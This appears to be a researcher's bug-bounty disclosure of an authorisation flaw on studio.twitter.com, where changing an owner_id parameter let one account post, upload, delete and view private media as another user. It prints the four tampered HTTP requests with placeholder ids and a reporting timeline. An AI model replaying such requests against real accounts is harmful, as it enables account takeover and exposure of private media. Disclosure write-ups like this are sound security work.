How I took control of your Twitter account (tweeting, viewing/deleting photos and other media)

Summary:

This blog post is about an Insecure direct object reference vulnerability on Twitter which could have been used by attackers to tweet from other accounts, upload videos on behalf of user, delete pics/videos from victim’s tweets, view private media uploaded by other twitter accounts etc. All endpoints on studio.twitter.com were vulnerable.

Description:

Twitter is an online news and social networking service where users post and interact with messages, “tweets”, restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.

Twitter had launched a new product named Twitter Studio (studio.twitter.com) in September 2016. So i started looking out for security loopholes after the launch. All API requests on studio.twitter.com were sending a parameter named __“owner_id”__which was twitter user id(publicly available and sequential) of the logged in user. Owner_id parameter was missing authorisation checks changing which allowed me to take actions on behalf of other twitter users.

Vulnerable request #1 (Tweeting from other twitter accounts.)

POST /1/tweet.json HTTP/1.1

Host: studio.twitter.com {“account_id”:“attacker’s account id”,“owner_id”:“victim’s user id”,“metadata”:

{“monetize”:false,“embeddable_playback”:false,“title”:“Test tweet by attacker”,

“description”:“attacker attacker”,“cta_type”:null,“cta_link”:null},“media_key”:“”,

“text”:“attacker attacker”}

Replaying above request with victim’s id resulted in a tweet from victim’s account.

Vulnerable request #2 (Upload Media from other’s account)

POST /1/library/add.json HTTP/1.1

Host: studio.twitter.com

{“account_id”:“attacker’s accountid”,“owner_id”:“victim’s id”,“metadata”:{“monetize”:false,“name”:“abcd.png”,“embeddable_playback”:true,“title”:“Attacker”,“description”:“”,“cta_type”:null,“cta_link”:null},“media_id”:“”,“managed”:false,“media_type”:“TweetImage”}

Replaying above request with victim’s owner_id, uploaded media from other user accounts.

Vulnerable request #3 (Delete Videos of other accounts)

POST /1/library/remove.json HTTP/1.1

Host: studio.twitter.com

{“account_id”:“attacker’s account id”,“owner_id”:“victim’s id”,“media_key”:“victim’s video id”}

Replaying the above request with victim’s user id and victim’s media_key deleted media from victim’s account.

Vulnerable request #4 (Private media disclosure)

GET /1/library/list.json?account_id=attacker’s account id&owner_id=victim’s id&limit=20&offset=0 HTTP/1.1

Host: studio.twitter.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:37.0) Gecko/20100101 Firefox/37.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://studio.twitter.com/library

Cookie:

Connection: keep-alive

Replaying the above request with victim’s user id and my account id leaked all private media’s of victim’s twitter account in response.

Video Proof of concept:

All tests were done on a friends account after taking permission. In the videos i am using my session cookies to tweet from another person’s account (Sunil Bhati).

#1 Tweet from victim’s account, Private media leakage

#2 Delete media from victim’s tweets

Timeline:

29th August - Reported all findings to twitter in 3 different reports as endpoints were different.

2nd September - Received response from Twitter team saying we are looking into the issue and will be closing out other reports as duplicate as they share the same root cause i.e. missing owner_id check.
3rd September- Bounty of $5,040 rewarded by Twitter
3rd September- Pinged them to check if the report falls under “Core Twitter” category for bounty as it impacted Twitter.com. No response from them.